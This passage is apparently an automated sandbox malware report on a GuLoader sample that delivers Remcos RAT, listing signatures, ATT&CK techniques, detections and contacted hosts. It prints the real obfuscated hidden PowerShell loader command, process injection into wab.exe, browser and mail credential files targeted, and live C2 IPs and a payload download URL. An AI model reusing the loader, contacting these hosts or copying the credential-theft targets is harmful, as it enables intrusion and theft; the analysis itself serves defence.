              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00418981 memset,GetSystemInfo,9_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Usitative\healthless\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Usitative\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: 87tBuE42ft.exe, 00000000.00000002.1783116237.00000000005F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\oo
              Source: 87tBuE42ft.exe, 00000000.00000002.1783116237.00000000005F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:99^
              Source: wab.exe, 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
              Source: wab.exe, 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.4209917973.0000000006628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\87tBuE42ft.exeAPI call chain: ExitProcess graph end nodegraph_0-3661
              Source: C:\Users\user\Desktop\87tBuE42ft.exeAPI call chain: ExitProcess graph end nodegraph_0-3436
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_12-33814
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_22162639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_22162639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,9_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_22164AB4 mov eax, dword ptr fs:[00000030h]7_2_22164AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_2216724E GetProcessHeap,7_2_2216724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_22162639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_22162639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_22162B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_22162B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_221660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_221660E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2B5FBC4Jump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hiugykswhvtyselocvbjhr"Jump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=get-content 'c:\users\user\appdata\roaming\usitative\healthless\hovedanpartshaver\ravnemorens\frsteinstanserne\instantiations.lil';$sears=$limpiness.substring(55857,3);.$sears($limpiness)
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=get-content 'c:\users\user\appdata\roaming\usitative\healthless\hovedanpartshaver\ravnemorens\frsteinstanserne\instantiations.lil';$sears=$limpiness.substring(55857,3);.$sears($limpiness)Jump to behavior
              Source: wab.exe, 00000007.00000002.4209917973.00000000066A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.4209917973.0000000006620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.4209917973.0000000006620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDG\
              Source: wab.exe, 00000007.00000002.4209917973.00000000066A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW
              Source: wab.exe, 00000007.00000002.4209917973.0000000006620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDG\9
              Source: wab.exe, 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000002.4209917973.0000000006620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDG\
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.drBinary or memory string: [Program Manager]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_22162933 cpuid 7_2_22162933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_22162264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_22162264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,12_2_004082CD
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000002.4207090075.0000000002B5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4048, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword12_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4048, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2028, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-YDAEDGJump to behavior
              Source: Yara matchFile source: 00000007.00000002.4207090075.0000000002B5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4048, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter
              Logon Script (Windows)212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              DLL Side-Loading
              1
              Credentials In Files
              29
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets141
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1429605 Sample: 87tBuE42ft.exe Startdate: 22/04/2024 Architecture: WINDOWS Score: 100 47 geoplugin.net 2->47 49 Found malware configuration 2->49 51 Antivirus detection for URL or domain 2->51 53 Multi AV Scanner detection for dropped file 2->53 55 10 other signatures 2->55 9 87tBuE42ft.exe 34 2->9         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\Instantiations.Lil, ASCII 9->37 dropped 63 Suspicious powershell command line found 9->63 13 powershell.exe 20 9->13         started        signatures6 process7 file8 39 C:\Users\user\AppData\...\87tBuE42ft.exe, PE32 13->39 dropped 71 Obfuscated command line found 13->71 73 Writes to foreign memory regions 13->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 13->75 77 Powershell drops PE file 13->77 17 wab.exe 3 15 13->17         started        22 conhost.exe 13->22         started        24 cmd.exe 1 13->24         started        signatures9 process10 dnsIp11 41 209.90.234.20, 2404, 49736, 49737 SERVERHOSH-AS-APServerhoshInternetServiceNL United States 17->41 43 172.93.222.219, 49735, 80 WOWUS United States 17->43 45 geoplugin.net 178.237.33.50, 49738, 80 ATOM86-ASATOM86NL Netherlands 17->45 35 C:\ProgramData\remcos\logs.dat, data 17->35 dropped 57 Detected Remcos RAT 17->57 59 Maps a DLL or memory area into another process 17->59 61 Installs a global keyboard hook 17->61 26 wab.exe 1 17->26         started        29 wab.exe 1 17->29         started        31 wab.exe 14 17->31         started        33 3 other processes 17->33 file12 signatures13 process14 signatures15 65 Tries to steal Instant Messenger accounts or passwords 26->65 67 Tries to harvest and steal browser information (history, passwords, etc) 26->67 69 Tries to steal Mail credentials (via file / registry access) 29->69

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              87tBuE42ft.exe21%ReversingLabsWin32.Trojan.GuLoader
              87tBuE42ft.exe33%VirustotalBrowse
              87tBuE42ft.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exe21%ReversingLabsWin32.Trojan.GuLoader
              C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exe33%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              geoplugin.net4%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://contoso.com/0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://172.93.222.219/cfEKrtHdTjiVs63.bin0%VirustotalBrowse
              http://geoplugin.net/json.gpy0%VirustotalBrowse
              http://geoplugin.net/json.gpm0%VirustotalBrowse
              http://geoplugin.net/json.gp%0%VirustotalBrowse
              http://geoplugin.net/json.gpD0%VirustotalBrowse
              http://www.microsoft.Cc0%VirustotalBrowse
              http://geoplugin.net/json.gpP0%VirustotalBrowse
              http://geoplugin.net/json.gpS0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://172.93.222.219/cfEKrtHdTjiVs63.binfalseunknown
              http://geoplugin.net/json.gptrue
              • URL Reputation: phishing
              unknown
              209.90.234.20true
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.imvu.comrwab.exe, 00000007.00000002.4226198772.0000000022130000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://geoplugin.net/json.gp%wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2236066946.0000000005667000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  • URL Reputation: malware
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2236066946.0000000005667000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.imvu.comtawab.exe, 0000000D.00000002.2279953992.000000000371D000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://geoplugin.net/json.gpmwab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://www.imvu.comwab.exe, wab.exe, 0000000D.00000002.2279953992.000000000371D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.nirsoft.netwab.exe, 00000009.00000002.2292686259.0000000002EE4000.00000004.00000010.00020000.00000000.sdmpfalse
                          high
                          http://nsis.sf.net/NSIS_ErrorError87tBuE42ft.exe, 87tBuE42ft.exe.1.drfalse
                            high
                            http://geoplugin.net/json.gpywab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2236066946.0000000005667000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.4226198772.0000000022130000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                unknown
                                http://geoplugin.net/json.gpDwab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://www.google.comwab.exe, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2236066946.0000000005511000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://geoplugin.net/json.gpPwab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    https://contoso.com/powershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
